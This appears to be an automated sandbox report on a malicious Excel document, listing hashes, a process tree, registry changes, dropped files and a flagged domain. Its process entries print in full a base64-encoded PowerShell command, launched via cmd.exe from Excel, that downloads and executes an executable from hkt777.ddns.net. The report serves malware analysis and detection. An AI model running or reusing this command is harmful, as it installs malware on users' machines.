File name: | Our Ref. ASG-M4493-14042019.xls |
Full analysis: | https://app.any.run/tasks/527f9113-c6dd-44d7-915c-f54981b7650c |
Verdict: | Malicious activity |
Analysis date: | March 14, 2019, 06:50:06 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Packard bell, Last Saved By: Packard bell, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Mar 13 04:14:01 2019, Last Saved Time/Date: Wed Mar 13 04:14:02 2019, Security: 0 |
MD5: | 7C0667D78913949EF966A06858A0B00B |
SHA1: | 30FC1DA62FFE97F581F4CFAFA9C2A73D11746CC2 |
SHA256: | 753AAC213F061BAEAAE2A33ECCE25429A29B021C31D5A45A2ABE264BCC4B3AAD |
SSDEEP: | 1536:ak3hOdsylKlgryzc4bNhZFGzE+cL2knAfiCdnlzMQRT26pdwiYJxgzAp4HJvq4a5:ak3hOdsylKlgryzc4bNhZFGzE+cL2knF |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 31 |
HeadingPairs: |
|
TitleOfParts: | Sheet1 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:03:13 04:14:02 |
CreateDate: | 2019:03:13 04:14:01 |
Software: | Microsoft Excel |
LastModifiedBy: | Packard bell |
Author: | Packard bell |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2932 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 4294967295 Version: 14.0.6024.1000 | ||||
2692 | "C:\Windows\System32\cmd.exe" & /C POwERSHeLl -E ZgB1AG4AYwB0AGkAbwBuACAASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACgAIAAkAEwATgBPAE8AOQBGAHMATAA0AE8ATgBSAF8AYgBvAGwAVgBxAHEAdgAyADMASQAgACwAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABMAE4ATwBPADkARgBzAEwANABPAE4AUgBfAGIAbwBsAFYAcQBxAHYAMgAzAEkAIAAsACAAJABKAGEAawAyAHcAUgBHAFgAQgBSAFkAQgBxAEsAQgBtAHEAVwA3AGEASgBTACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEoAQwBWAHcAVgBDAF8AQwBVAEUAeABYAFAAZwBOAFcAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXABWAE8ARgAzAFIAQQB6AEUAeAAuAGUAeABlACcAOwANAAoASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACcAaAB0AHQAcAA6AC8ALwBoAGsAdAA3ADcANwAuAGQAZABuAHMALgBuAGUAdAAvADQAQgAxADQARAAyADAALgBlAHgAZQAnACAAJABKAEMAVgB3AFYAQwBfAEMAVQBFAHgAWABQAGcATgBXADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3376 | POwERSHeLl -E ZgB1AG4AYwB0AGkAbwBuACAASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACgAIAAkAEwATgBPAE8AOQBGAHMATAA0AE8ATgBSAF8AYgBvAGwAVgBxAHEAdgAyADMASQAgACwAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABMAE4ATwBPADkARgBzAEwANABPAE4AUgBfAGIAbwBsAFYAcQBxAHYAMgAzAEkAIAAsACAAJABKAGEAawAyAHcAUgBHAFgAQgBSAFkAQgBxAEsAQgBtAHEAVwA3AGEASgBTACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEoAQwBWAHcAVgBDAF8AQwBVAEUAeABYAFAAZwBOAFcAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXABWAE8ARgAzAFIAQQB6AEUAeAAuAGUAeABlACcAOwANAAoASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACcAaAB0AHQAcAA6AC8ALwBoAGsAdAA3ADcANwAuAGQAZABuAHMALgBuAGUAdAAvADQAQgAxADQARAAyADAALgBlAHgAZQAnACAAJABKAEMAVgB3AFYAQwBfAEMAVQBFAHgAWABQAGcATgBXADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2264 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 4294967295 Version: 14.0.6024.1000 | ||||
2888 | "C:\Windows\System32\cmd.exe" & /C POwERSHeLl -E ZgB1AG4AYwB0AGkAbwBuACAASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACgAIAAkAEwATgBPAE8AOQBGAHMATAA0AE8ATgBSAF8AYgBvAGwAVgBxAHEAdgAyADMASQAgACwAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABMAE4ATwBPADkARgBzAEwANABPAE4AUgBfAGIAbwBsAFYAcQBxAHYAMgAzAEkAIAAsACAAJABKAGEAawAyAHcAUgBHAFgAQgBSAFkAQgBxAEsAQgBtAHEAVwA3AGEASgBTACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEoAQwBWAHcAVgBDAF8AQwBVAEUAeABYAFAAZwBOAFcAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXABWAE8ARgAzAFIAQQB6AEUAeAAuAGUAeABlACcAOwANAAoASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACcAaAB0AHQAcAA6AC8ALwBoAGsAdAA3ADcANwAuAGQAZABuAHMALgBuAGUAdAAvADQAQgAxADQARAAyADAALgBlAHgAZQAnACAAJABKAEMAVgB3AFYAQwBfAEMAVQBFAHgAWABQAGcATgBXADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3448 | POwERSHeLl -E ZgB1AG4AYwB0AGkAbwBuACAASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACgAIAAkAEwATgBPAE8AOQBGAHMATAA0AE8ATgBSAF8AYgBvAGwAVgBxAHEAdgAyADMASQAgACwAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABMAE4ATwBPADkARgBzAEwANABPAE4AUgBfAGIAbwBsAFYAcQBxAHYAMgAzAEkAIAAsACAAJABKAGEAawAyAHcAUgBHAFgAQgBSAFkAQgBxAEsAQgBtAHEAVwA3AGEASgBTACAAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAEoAYQBrADIAdwBSAEcAWABCAFIAWQBCAHEASwBCAG0AcQBXADcAYQBKAFMAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEoAQwBWAHcAVgBDAF8AQwBVAEUAeABYAFAAZwBOAFcAPQAkAGUAbgB2ADoAdABlAG0AcAArACcAXABWAE8ARgAzAFIAQQB6AEUAeAAuAGUAeABlACcAOwANAAoASAB1ADIAZwBqAEgASwBYAFcATgA3AGIAUgBtAHkARwBKAFUAYQBpAFoAZwAzAF8ATQBhAHQASQAgACcAaAB0AHQAcAA6AC8ALwBoAGsAdAA3ADcANwAuAGQAZABuAHMALgBuAGUAdAAvADQAQgAxADQARAAyADAALgBlAHgAZQAnACAAJABKAEMAVgB3AFYAQwBfAEMAVQBFAHgAWABQAGcATgBXADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | |+% |
Value: 7C2B2500740B0000010000000000000000000000 | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel |
Operation: | write | Name: | MTTT |
Value: 740B0000D6CA843832DAD40100000000 | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete value | Name: | |+% |
Value: 7C2B2500740B0000010000000000000000000000 | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency |
Operation: | delete key | Name: | |
Value: | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2932) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\199CE3 |
Operation: | write | Name: | 199CE3 |
Value: 04000000740B00003600000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C004F007500720020005200650066002E0020004100530047002D004D0034003400390033002D00310034003000340032003000310039002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0001000000000000009061C33A32DAD401E39C1900E39C190000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2932 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR936C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3376 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MKCGVOUBGUIOXY1PLLMT.temp | — | |
MD5:— | SHA256:— | |||
2932 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFB53AC2264DDA48B6.TMP | — | |
MD5:— | SHA256:— | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR8BE6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3448 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U6J2W5NMOVNYVDKL0QJ7.temp | — | |
MD5:— | SHA256:— | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFF9F6EC126E3CCCC2.TMP | — | |
MD5:— | SHA256:— | |||
2932 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF86C120D11EF206A5.TMP | document | |
MD5:AE7B255CA955F934B1C6A6F407A0BA92 | SHA256:98D759244B0845C381B679D64CA6802849DDD7798E676F87A270293BF3BDF47C | |||
3448 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2932 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Our Ref. ASG-M4493-14042019.xls.LNK | lnk | |
MD5:EDE65DAF45A2962144C5EF7E6EFFA5B2 | SHA256:8FEDF365980BB74006458ED82FEADE260643BBBE86F6891F6C5607761715AC7D | |||
3376 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a639.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
Domain | IP | Reputation |
---|---|---|
hkt777.ddns.net |
| malicious |